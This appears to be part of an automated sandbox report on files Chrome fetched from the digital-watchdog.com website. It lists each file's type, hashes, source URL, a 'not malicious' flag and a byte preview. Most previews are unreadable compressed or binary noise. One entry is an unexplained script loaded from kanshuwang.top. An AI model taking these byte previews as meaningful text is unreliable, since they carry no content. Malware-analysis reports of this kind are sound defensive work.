                                                                                                                                                                                    Preview:.......h.,....O.~.^F....w.y.+.........S^..ZM... .a.j...4....@..p...].\dK.s./....J......"y..).u.|..H.rI'.C....1.1.3..aHL..I_T...e..O.?".R..5.}S..=Z8a`..\#>..}#Qh.A#.d........HL..W....s.......b....B.......7(..}?..pKg....k..C..3.Vz..4u...".*...a..zj..cX?....+.r...8}...s.Z....Z(.Hj.g.W.*.........{..j..[8...DD..T.8G1.L....&&..`.P...'<TLf..,..2...m...~.H.6....2.$..x.tA.<.:*)(...-..+...h...J4c.l:2......x..).*.Z...F[z'..S6....D......E[....s.......t..*....:n@9.<.1..;>.+f.._....I&...2..7..B..D...J[!..*..U...q8._>>99..l...Lr.-..h;.#........>....DA.W.R)1/.F..T...e....2.e......2+...!m.b[.......By...LC\.z.|...GH..{n.....W,^..T....C;<C....$:..(x|...1!.........:.K>l.....b...J...?.w.7.o..M..CA..i.......%..kTS=.C.r.o...R.....).qy.9.OgA.~..K*l..n...X.aK.b...~s.[2\....s..J...F*...*h..Hu./(B].?.kr+k?......P..'h..9.......P:.j(..O.....cm.?:..I.T..0.......$.H..".t;.5..."..dH...=h..`8t.y$..~~.,j...I...9|*=..<....c)..F.y......^..FVf..Qe~..$.....\......%.f.A:.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):12774
                                                                                                                                                                                    Entropy (8bit):7.975106371549607
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:24D281909F7379FE23A53C1D2835FE96
                                                                                                                                                                                    SHA1:543E6CD2D6C3A50090E902B8474EBDDC04E4C144
                                                                                                                                                                                    SHA-256:B13E7E9F32375223F7332E2273E77A31EDE8DD971B900D1EEE05C707810424A7
                                                                                                                                                                                    SHA-512:F2AA2DC54BB0034F57ECB70C7134101E7ECAF5EC1BB4AC0A9845A3D3C298B8D76DDA6A0A772BB29BC075920C47129A87FFA19CF2562A6E866041E285EE532266
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://use.fontawesome.com/releases/v5.8.1/css/all.css
                                                                                                                                                                                    Preview:(./..X.....F-.NF..0...uF..q.V....Vr..y@.F1|M.......1..FL...7.C..}:.;......u._@,.t....s..1..9.#.....%F.#.{R..2$ep.\.2*I.".p8t...@..4.b.Q..-.#55...Q...F.A|h....6.X...S8...`m..Q.. ..Im..9.....<7.6.......;...[.L...p{...0U.h.R.Hb~....o]..\.T_.ra.x.t...]..s...\.@..OC;.....0..m.......Jf..."..-.V.C[..G....,.E.q ..C%X...t....q...R..N+...o...vU..iW.c..c{..-..P:T?.eYL..~.3mZ...4I..t64.h:{.=.I..e.rf2.1.2..1.).A. L-S...L..f(\..?.K(..R.3.PJ..\..p (%:....<C..i.\.P.'..5...->..co.u$Y.A. uP.....$.Nj.9..j...B...Zm....g..p.5..MLz......p..+...Lb..2..N.!4V....5.U....I7CmCO.R.$"........1...e....5....(..#..\ZgV...m.$...3'.C...|o....@..Z0T..!.srk....Y.....Fo...1...........<.......t..............9R..P.OH...H..i...... 8pit.......I...R...0..*@.n..\. ...5..&........\'....g.......`..@.J...8..;.0].....i.......[....p....L'.......b..t.K.m.[N3."$4...c....J...&.u..@X%B88X8!$ ..Y....,............#....)...}".`.d.4dD.....t...`=Il.V&X.!.............jf...&...P...4rk.x. ..P8..`l-.RB.TX.T
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):24423
                                                                                                                                                                                    Entropy (8bit):7.99149724768654
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:DD3EECA5FFB3EA963B9AF996B9ACA024
                                                                                                                                                                                    SHA1:6399A339FDA96D81F10CD3B242814603AB4E5130
                                                                                                                                                                                    SHA-256:1F9CDC6019DC1405CF0F8D65C872B95731A928E9684F5E1E717B5181BDB74184
                                                                                                                                                                                    SHA-512:8F7D47C25F518D15940411E9FD51F26C54AC8EC337B2BEC00652BFF44EAFEE1C103B229E74276ADDA531E1AFA6F4786D90AE2E60F1F9A7685CAAB7D2A882CC90
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css
                                                                                                                                                                                    Preview:[m`"...."r....)0.w.@........e...?_...rV.f..R...m].m.<. .r}...........k.OU..M.t..m42......\4.N1......r.KF.x...w..%.b/.A`.\...4.?.a...E..B.n.+7e.>m....e.e2Q.al."*.M..Y.l.}...r@.i.5..."M.Ou)Ujg..9.-E...0.....}....f...c..j2.y..B?AY.2.m.&H.B.,..hU....J..'..ko....wB..QQ.w...6;..O..o...mc..=.j...BHx..uM../.Wi....g..g....s......EF_l'..2.....JZo..M.....=P.Ml. ...4o_..o.+...J.IGto.......<..-...q..W]~C_Q..\0.`.....p}...V.r...c+.%..e..o.+.}...E.)=.....^....z358R.&.U...o..y.:...~..............6...A........<..l..0<.-g...............m...]/]?..$g.g;I........y....H.....y.'...%9....].FB..0<.6]..H.....wZ.~$.n...s.~.%...:.._.X.>.g.H......F....o.o..r....>....o.R.r..?9l.Z......9l...k.\..<.~....kcM.Eo...w...z.o\a...Gu1..Q_.5..#8...O.......[.?...{.O..-..../O....J.O.....6i....=.I.....C...=?i.....71.C.. $..>.e{..|.....&..F..j.g..{.QOn.o..3..W..@'.......)..{..3~R..;.3...?.]...%...................-...J..k.a..7..Z<..j.-o.:.S.F.p.c+..ZH.~9.._n......Gt$Je.,.(U..y)..=.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, from Unix, original size modulo 2^32 14690
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4721
                                                                                                                                                                                    Entropy (8bit):7.950735634622232
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:FFDB2DB66570DD504B144D32EAFC8C51
                                                                                                                                                                                    SHA1:E096CDF9B6BB80B681486DF161F44B73D6CC06D3
                                                                                                                                                                                    SHA-256:F8A29FAED4605BDB16DBE68CA4883CBE52A49773A4B134A566D78539E5EAB357
                                                                                                                                                                                    SHA-512:CFDED2F483DA3664B878062613A4D619CE7A7B1A2DF1176C7134AF7C70014C1B5A8C149D5C6B6A5BC68D0B5B8ABC0EE3B1579ACCDFFFD9289EA2B6671383DA32
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://unpkg.com/aos@2.3.4/dist/aos.js
                                                                                                                                                                                    Preview:................[.o.6..+.p....N..:e..k...M..8.qnAI..X"U......?P.d%q.m....v..)rf.......p^...%.'.?x*...(............g-.J._5?...Z..^+sO........USD.w...K.^.~..oj.-m.].C.....m..`..~h....~.s$o.....r;.....A].}..M..D$SE2...L....;.e....".l1.A.F..a....d..rb..Jb..z.0..#..x.n..!.?x...c...w.).....|...?r.1..>$|...N.v.hy].u.....x4aJ#Gd...~.tZ.\Z.d\.vqi...C.C.vk..[65.r .B+..=..3..Y..k.ifN..}......o[..DS..0...H..cRR..&1....C..1.S..0I.BsL2*.{L..P.I..DT....{.c....0I..)&..P.IEo....dM..|n...'!Ix.6.pf.L..g.{$)5ss6=.C....O.c.d\....a..z._.....K.c..............I.#U.xWq..P....p.... ..=.w...SC}...J.d..i.R.......q.GK:.1Y....($.`.7.Ud...I..*p.bRm.u.@5.bO..=.[...M0W.../........h.....Z-..r.%..S....HF..>....g.:.xx.....L..a...*...(....v....a..X(......3.}F.T....[...c.........3.S.\6.=Qq....2..VB&...UQ..n.:.9$..W.....(@..Z...p..'n.(V...B....L...L....0........./..DZU.k..*.|.n... d:X03.8...H..e.U...m........ .<....N....f.Q.6<......j.K....J.77<.U.y.J6......,Y.M.r:.v...,.v
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):139990
                                                                                                                                                                                    Entropy (8bit):7.998033330311501
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:324A222265B989C4628F9D10232474E4
                                                                                                                                                                                    SHA1:6CE42746D30EE5C45C6AC63E3F4005F49F9F5653
                                                                                                                                                                                    SHA-256:23809C3914B44D595616DC257E186ABE99ACFFB68E78A672D35A0E8733323DAF
                                                                                                                                                                                    SHA-512:B9F33E0D4D7C86CA4FE3E11B5D15044D7BEC2C82FA79F1582DFFF888CD8C53D8146BD17C6929A07F08AD9E9993D65334581A80DEF2CC9B518C6B18E3B6B6D4CE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://www.googletagmanager.com/gtag/js?id=G-M0RPWMLFQV&cx=c&gtm=457e55s2za200&tag_exp=101509157~103116026~103130498~103130500~103200004~103233427~103252644~103252646~103351869~103351871~104481633~104481635~104559073~104559075
                                                                                                                                                                                    Preview:[..V3.&.......CF$..=.5.6........Z'.7U..O...._..._..q7..i..................+.W......'...$P.!i.:3..h).#.-#.y@s..5...?o.b....G....$`....1...k...9....K.7O.=*..,I..>..B d.Yf.MN.&...l...L.....d..+..7...^..@Al.%.T....|........./<...Y.~r{.mjv.8<.7.;@..It..Rg.s9.. ...R-...5K.a...1e..?.....|....i.B.v......NZ'.<!.bSl.%6..{.....|...:U..j.;.Q...M.1...5.^....E.Q....k/.Z..SZC.vB...K...t.......".".{lPS<....{.E...,..N.....'..RJ.!..^.../.........[e.."..L .idM.A.p.R..{.0.Y..z....K..>..73..f.....`N..r.....Y$..Gf.{........>......e.D.......e.Z*R.3...=...aTZ.....%. ....TPV....7-s>.*pel. R..Xk".F....}...F..@. .."hbP%pf.{.......U5@J....:.c\H....*S......*...WI.e.l/3.B.q..=.....y.....c...J;y...v..../...q..j.....l.....5.x..l.................=..>.$|.1.g2&...!.). .8-...B........|..k....bX.^C.z.C.{W.H.!Bl.....4.|R...^...Q.`.......3{.U....Q....2..s.....%&!.;._.6...EA.5..rj>...y..k..u......h.m*.Es..l.%gj+...g......!..`..l4.P...!N?....8'8..7H@..._..w.bH.....6.M."+..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1422
                                                                                                                                                                                    Entropy (8bit):5.093626235889133
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:40C58A6D77D11BB431605820072E1E13
                                                                                                                                                                                    SHA1:7713B637AEC5B76A7E9EE91A5C72A78C8FAF3F3E
                                                                                                                                                                                    SHA-256:BDD47113CD9C68ABB088DB6B0DAE6FE7D270142C8584DFB42D502A81CFD03A93
                                                                                                                                                                                    SHA-512:AE50015F66D6C5318A6644FB72840C09BC7B5666EAB057701DA11E6C0F7090D5704309EAE1437EAB4EBA5D1F3FD6B9B86E4C4B43473ED0C62ACE2750DDBD42C1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/js/auto-suggest.js?20250530073516
                                                                                                                                                                                    Preview:..$(document).ready(function(e) { ...// Auto Search Options:...var globalSearchInput = $('.global-search'),....globalSearchSuggestion = $('.product-search-suggestion'),....globalSearchValue = '',....globalSearchTimeout;.....globalSearchInput.keyup(function(e){....if(e.which==13){.....e.preventDefault();.....let val = $(e.target).val().trim();.....if(val!=''){......let url = location.protocol+'//'+location.host+'/search-result/?keywords='+val;......window.location.href = url;.....}....}else{.....globalSearchValue = globalSearchInput.val();.....if(globalSearchValue=='') globalSearchSuggestion.html('');.....else searhSuggest(globalSearchValue);....}...});...$('.i-global-search').click(function(e){....e.preventDefault();....let val = globalSearchInput.val().trim();....if(val!=''){.....let url = location.protocol+'//'+location.host+'/search-result/?keywords='+val;.....window.location.href = url;....}...});.....function searhSuggest(search){....if(search.trim()!=''){.....$.ajax({......type
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 23760, version 1.66
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):23760
                                                                                                                                                                                    Entropy (8bit):7.9914542581486785
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:5C3E7462506E1B3C0095DA29FE787D52
                                                                                                                                                                                    SHA1:136AE49F995AAEA3DDB8AB8E21CDF40B666D1915
                                                                                                                                                                                    SHA-256:AE155E67553E225A7B491490DBB0D1821F6B76174FCECE929B8C6F3ACF2E3E1E
                                                                                                                                                                                    SHA-512:3A9C46C3B361AFF0281EB3E1C623ABC92A810947AA277CDE8437A1400984F1F025AA3B96484F2F1812752C874E797F15B484B3EF42F80B7D073007D576C907F7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/fonts/ItalianPlateNo2Expanded-Bold.woff2
                                                                                                                                                                                    Preview:wOF2......\......./...\o...B.......................$..N.`..............$....6.$..x..>.. ..u.....#[..qv...6..U.p.....l....N.$..2E............ON&c......VZ.BDE...c..sm2.m....F4.s.y.&.......H2..U.L8q..0C.r3q{{..hjU.4.<.G....:........h..w.........7.&&.D+quC'.s.........[o..$1.;W9....U.....%!......./..@....*.!...Y~.jQL.a.].S..j.WPbq.....5~.;.v8............j...A~...iY.Q.p.r"&T`./.l..#H........O...t;.`U...1..C....~y*T.,...B.^U...q...W.[]T...J..D.R....X4,..E..\....a$..=...<.......*.....T.[.....5V..9t.)u.V.R..Cs..g....0u...T.m....R. .......Q..................._....U.M}.wU..6.U.....C"U.9]""G.f`.2......~S..-_.......K(....f..(.....U...$......6..................i.....O.YG.0..$)~e.../b.pj..........Z..._...u.....=.0..H.r2).O|.00I....5B....zf>..N......d.LN&.$yIN.Ir..$I..tQ.!X...AB...?,..!.*&.D./,s..U... ).S...nL2...pX...6.>n...(..J!.L...J.:..e...k.p.64..i........B...G..K;.a.B.S.x..a@j.......:U..;.....$..M..}w..@...b..H.98..).$E.....r.\..73....).....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 450 x 450, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):306482
                                                                                                                                                                                    Entropy (8bit):7.993863198489318
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:283FAC61F397194FF037777375916766
                                                                                                                                                                                    SHA1:1079FDA490533D4264C554C1B8BA6BEC031B33CF
                                                                                                                                                                                    SHA-256:1E815F3A2054CB7F9E8DA587F2EF4998AE0F4BACB11D5B5EC480EED41DF92152
                                                                                                                                                                                    SHA-512:00D96279A6D700D55D3209122BE44D1C9DF833654273675E7EFF02EE8469D48DDFDD745836AFC248BF86D4F8D1ABC4D96520A57CAD88EF66900AD84FA61F07C7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:.PNG........IHDR.............|..E....sRGB.........gAMA......a.....pHYs...#...#.x.?v....IDATx^\..{..<..[w...8.... @.....I."5K.l..;v................S...........D..Z...;'{.6..........>...4..G....`8AMs.[*.T........[.P*WQ.TP*...}....h.l.F.z.d..Pm.C..C....#D....c$.S.#$.'.o:P[2T........s.C............z...?.. .......|.+..t........j......B...Fqk."l..het.]t.].f..UBh..7...e.FE6.,......zUn.QA..cVd...2\}.z.y...=L.G..UAd..YU.v..SC`W.k..2b.....+.kV..U.f.A...^.Y+.Y...VQ*.P*....#....?.`.....n...j.;;.o...B.%....t.d.Aot.lz*..d|....C.}.G.7..O0..c0..#.../...l.A...`.....g..kNe.|~.dz.lv.l|......)F.3......K.f....j..]..^..V...[B....^....*.**..J...U..k54.5..e.n.V*..P..Q..K....K..*r.Z..j..j......>^..\F.RF.ZA.....,[..*...n;<.v.(......;e9.n...7o....M.g.|.g-..EyG..wwwQ*....]y..].o....k.e...<.^..]T.U.v...../.[y...$.S.\...g.Z.......T+r[....r.*.).5.*..~.n.^T...wg..n.T.....{.q..n..............w.....s7o..[.........[...A.T.Q...kp..n.... ...^.$H..r$...................#.7.X..1_.a.>.T.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, from Unix, original size modulo 2^32 612508
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):187179
                                                                                                                                                                                    Entropy (8bit):7.99836365600876
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:2132C8B02B163F95A56555A05BE229D3
                                                                                                                                                                                    SHA1:DE564241B427A9109F7455CB43312FAEA30B566D
                                                                                                                                                                                    SHA-256:976CA2B4E627F1AF6EDF0E1DAFD745B057F8E571DC1CD657E8111C6355642831
                                                                                                                                                                                    SHA-512:F694F331BDB9D46DECD1803A97987ABE1AB30A5FD7EB30B2706BC3D0B412AD7A59367B2E5C4BA99ED1F9E7EEF896A7B32EA881B3ED5A23CEABBFFE12DF222F91
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://kanshuwang.top/ls/index.js?c531fe8f142fa15351
                                                                                                                                                                                    Preview:.............~........SW.)E./I..^.c7I.Kl.i.x9..I.).%)......{..$gfp!HQv..o.X.....3.........Fesf.cV...s...D..+'...R7p.C6J^.c..:Q..2..F.I..0T6.d.3.l.......w.T.86,Vu...{...s...]r.tY...?.....'...J...Z..Y./..i..y..AO.K.$....Z...K??...LYTJ..Y3...j..8.U*.`.Tbg.7...Vb.y=+....V..E.;a..^..Qi......q...+}x..q6.v..b..$.j....(...7...Yg...]9e...D.!....Q..X{.(.|'..w^.E.NT..C.{.8.`.GlbX.:h..f+...Qe.Vk.7.;(W...J....R}.E.Q.0U.?f.M=.z.s.../...V.3...9.?k...:d|^]_...U..Y.....Fu}Kk|2.....^..Q8.o.oV....R..L.E..;....&.)...Y}....T|.[.0.?H.....S.d.,..}....B..S..B.u.).SX...S...S.l....%(R..2.8......m..B.3.F.B...J...u.R.F=o.P.l].s.~RI".a....s.i.....$...^....;.[.._..U....nj...=g...&P.....l....b.9....qb6..j:..EV..zA.f..7.(.g...{_.;:A.......l.J.L.nk.D}.O..:..f..........}.$../W7H..$%.....G.WVq....Y..~l...V..C)....O}...Z.P....Jje.>.Y.G..$......FA4t|Q.......c1..E...+...O..HG.08t".B.h& Zk.To4..$bN+I.V&^7.4.....t...2..e.%>.2...en ..x..q.`.L..m=.a>.[..5X....`..l..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 883 x 676, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):245403
                                                                                                                                                                                    Entropy (8bit):7.983179546670038
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:06ED2F020216B1A0FB29E114B41510FE
                                                                                                                                                                                    SHA1:0D15B3817402ADBBFF292AE3E373916FA57FC03C
                                                                                                                                                                                    SHA-256:4F1507D721627480D185F182B4B82C8A77466705236F6E9C4A24037FD6C15BDB
                                                                                                                                                                                    SHA-512:606AA3560380E9BB809673F6D5894CB1A2342D7B7EC9FF7A6DFF1EB9207B0F33497887E73F699CAFFD03D4662F5E481772DC24F1EC0569DEEAFC964CAAC86E6C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://dmq883log67hn.cloudfront.net/assets/_medialibrary/Analog_Family_new.png
                                                                                                                                                                                    Preview:.PNG........IHDR...s...........fY....gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5993), with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):6506
                                                                                                                                                                                    Entropy (8bit):5.855846348071569
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:77F413335A18F9A804B2D75659717B4E
                                                                                                                                                                                    SHA1:1F55C4514F09931AF195F65BFF593C212CCA2AD3
                                                                                                                                                                                    SHA-256:DD7CBB65F612C5DEC39656B99F4D5F64F76948AB2EE341242921C6DD2AF8970C
                                                                                                                                                                                    SHA-512:88B76F7D0491437B4528DB14EE60BD1FD78667E96549A3E649E56EE426BC28804F1557C822EDC8EE60FFB4CF6CA7673436629894554A3772BEE77352B732AEE0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/library/jquery-toast/dist/toastr.min.css?20250530073516
                                                                                                                                                                                    Preview:.toast-title{font-weight:700}.toast-message{-ms-word-wrap:break-word;word-wrap:break-word}.toast-message a,.toast-message label{color:#fff}.toast-message a:hover{color:#ccc;text-decoration:none}.toast-close-button{position:relative;right:-.3em;top:-.3em;float:right;font-size:20px;font-weight:700;color:#fff;-webkit-text-shadow:0 1px 0 #fff;text-shadow:0 1px 0 #fff;opacity:.8;-ms-filter:progid:DXImageTransform.Microsoft.Alpha(Opacity=80);filter:alpha(opacity=80)}.toast-close-button:focus,.toast-close-button:hover{color:#000;text-decoration:none;cursor:pointer;opacity:.4;-ms-filter:progid:DXImageTransform.Microsoft.Alpha(Opacity=40);filter:alpha(opacity=40)}button.toast-close-button{padding:0;cursor:pointer;background:0 0;border:0;-webkit-appearance:none}.toast-top-center{top:0;right:0;width:100%}.toast-bottom-center{bottom:0;right:0;width:100%}.toast-top-full-width{top:0;right:0;width:100%}.toast-bottom-full-width{bottom:0;right:0;width:100%}.toast-top-left{top:12px;left:12px}.toast-top-
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 1920 x 1200, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1701117
                                                                                                                                                                                    Entropy (8bit):7.994210545713696
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:BEA7DAC069C4A0E66375C89AB264A31A
                                                                                                                                                                                    SHA1:3DED1B85165734B996684D120D1E4AC68195630B
                                                                                                                                                                                    SHA-256:711248EB9FC1B25A74BE0DE04D0097ACBA01ED69D23F145E393E8AC04B255C19
                                                                                                                                                                                    SHA-512:11B3E030387AD31B28D40C8F8A6A8ABF0FE5B5C93AED7D1A4D252C5FD9AF26611166AEF0E5FA9B371DC2A349727B333F00B860ABD1DC60B0E004553BC69BDBEA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://dmq883log67hn.cloudfront.net/homepage_assets/DW_Spectrum_IPVMS.png
                                                                                                                                                                                    Preview:.PNG........IHDR..............0W.....pHYs.........g..R....IDATx...y.5.y.y...s...)....dM..e.x66.l..Q4.h.MSSC7..^.S.4fu.0..VAS...U.X.....l...$..`.V.f9%.R.z.|.;...w....'n...{...G.V....v..v...x...............>............................!H............. ...............0..........l..............!H............. ...............0..........l..............!H............. ...............0..........l..............!H............. ...............0..........l..............!H............. ...............0..........l..............!H............. ...............0..........l..............!H............. ...............0..........l..............!H............. ...............0..........l..............!H............. ...............0..........l..............!H............. ...............0..........l..............!H............. ...............0..........l..............!H............. ...............0..........l..............!H............. ...............0..........l..............!H............. ..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 567 x 567, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):12187
                                                                                                                                                                                    Entropy (8bit):7.876391836267832
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:7C18071F8C0EBBEA57215989B8162281
                                                                                                                                                                                    SHA1:EC246D8F4B4DF4BC799919A291ECF8325F0FA4DE
                                                                                                                                                                                    SHA-256:68F6C368390E20E26620F7EE6889F16C8F65949FBDD86DB6A69CC4D9E9E46851
                                                                                                                                                                                    SHA-512:5778D601D1EEC86C6C33FAC05660B42A007D27A244851AAB0087C7D969DF74A7C3F93CD4CBBC842620A52C9AEF94DBF7FF190FBE058F582E91A504FEE322E4BE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/product_detail_assets/youtube_orange.png
                                                                                                                                                                                    Preview:.PNG........IHDR...7...7.....g(z.....tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Macintosh)" xmpMM:InstanceID="xmp.iid:89AA79F0501811EDA3C588EE09F49F97" xmpMM:DocumentID="xmp.did:F893417A50CD11EDA3C588EE09F49F97"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:89AA79EE501811EDA3C588EE09F49F97" stRef:documentID="xmp.did:89AA79EF501811EDA3C588EE09F49F97"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>F.S...,.IDATx...K.\W./....@.o<...5......e.$&.}...m..EBt<.....I....q#.;Bi.0.....H..a.."..+.....<.y..u..T....^...I.2.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):963
                                                                                                                                                                                    Entropy (8bit):5.28428845670125
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:27402E3BA7944ADB99ECEF377C8530C6
                                                                                                                                                                                    SHA1:4EDEE796D22487123ABC885BD7B25FA918100105
                                                                                                                                                                                    SHA-256:6D2776EBDD6023D093A5099C67064B04A19138D95C818BFA2A899BA255AE31F5
                                                                                                                                                                                    SHA-512:AA96496AD33E75DEFF8A8C2D4F5185D94E708B3F6F3ADD560C8D9FC08FD9357713854649A018E4133959E2F2B5DD47321A48888896C67725EB7C01D4928428D8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/assets/20220503113243-img-246952568.svg
